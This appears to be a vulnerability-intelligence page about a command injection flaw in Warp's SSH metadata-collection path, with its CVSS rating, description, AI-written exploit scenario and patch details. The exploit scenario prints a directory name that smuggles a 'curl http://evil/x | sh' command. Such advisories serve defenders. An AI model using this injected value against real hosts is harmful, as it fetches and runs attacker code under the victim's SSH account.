Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Network-reachable and low-complexity with no attacker privileges, but the victim must connect an SSH session (UI:R); injected commands run with full read/write/destructive capability as the victim's remote account.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
Warp is an agentic development environment. From 0.2023.03.21.08.02.stable_00 until 0.2026.05.06.15.42.stable_01, Warp contains a command injection issue in the legacy SSH background command path. Warp used the remote working directory reported by the session when building helper commands for SSH-backed metadata collection. A remote host, repository, or directory name controlled by an attacker could cause that helper command to execute additional shell syntax on the remote host as the victim's authenticated SSH account. This vulnerability is fixed in 0.2026.05.06.15.42.stable_01.
AnalysisAI
Command injection in Warp's legacy SSH background command path lets an attacker-controlled remote host inject shell syntax that runs as the victim's authenticated SSH account. Affecting Warp from 0.2023.03.21.08.02.stable_00 up to (but not including) 0.2026.05.06.15.42.stable_01, the flaw stems from the terminal trusting the remote working directory, repository, or directory name reported by an SSH session when assembling helper commands for metadata collection. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the victim to use Warp's legacy SSH background command path for remote metadata collection against a host where the attacker controls the reported remote working directory, repository, or directory name, and that name must contain shell-breakout characters such as a single quote (e.g. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H yields 8.8 (High): network reachable, low complexity, no attacker privileges, but user interaction is required because the victim must connect Warp to a remote host whose directory/repo names the attacker influences. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who controls a remote host (or can influence directory/repository names on a host the victim accesses) names a working directory something like `/tmp/x'; curl http://evil/x | sh; echo '`. When the victim opens or operates an SSH-backed Warp session and Warp collects metadata, it builds `cd '<dir>' && ...` / `cat <histfile>`, the embedded quote breaks out, and the injected commands execute as the victim's authenticated SSH account on that host. … |
| Remediation | Vendor-released patch: 0.2026.05.06.15.42.stable_01 - upgrade Warp to this version or later, which adds shell-aware single-quote escaping (shell_escape_single_quotes) around remote paths. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all Warp SSH users in the organization and alert them to connect only to trusted SSH servers. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
It was possible to bypass policies configured for Zero Trust Secure Web Gateway by using warp-cli 'set-custom-endpoint'
Arbitrary code execution in the Warp agentic development environment (builds 0.2023.10.24.08.03.stable_00 through 0.2026
Arbitrary local file write in Warp terminal (0.2025.03.05.08.02.stable_00 through builds before 0.2026.05.06.15.42.stabl
Using warp-cli command "add-trusted-ssid", a user was able to disconnect WARP client and bypass the "Lock WARP switch" f
Command-execution permission bypass in Warp's default unsandboxed CLI agent profile (versions 0.2025.10.08.08.12.stable_
Command injection in Warp's prompt branch-selector chip lets a crafted Git branch name execute in the victim's shell whe
Clipboard hijacking in the Warp agentic terminal (versions 0.2021.04.25.23.05.stable_00 through 0.2026.05.06.15.42.stabl
Command injection in the Warp agentic development environment (Linux builds 0.2024.02.20.08.01.stable_01 through pre-0.2
OS command injection in Warp's AI Agent code-search tooling allows attacker-controlled inputs to escape read-only search
Due to a hardlink created in the ProgramData folder during the repair process of the software, the installer (MSI) of WA
An unprivileged (non-admin) user can exploit an Improper Access Control vulnerability in the Cloudflare WARP Client for
By using warp-cli subcommands (disable-ethernet, disable-wifi), it was possible for a user without admin privileges to b
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39014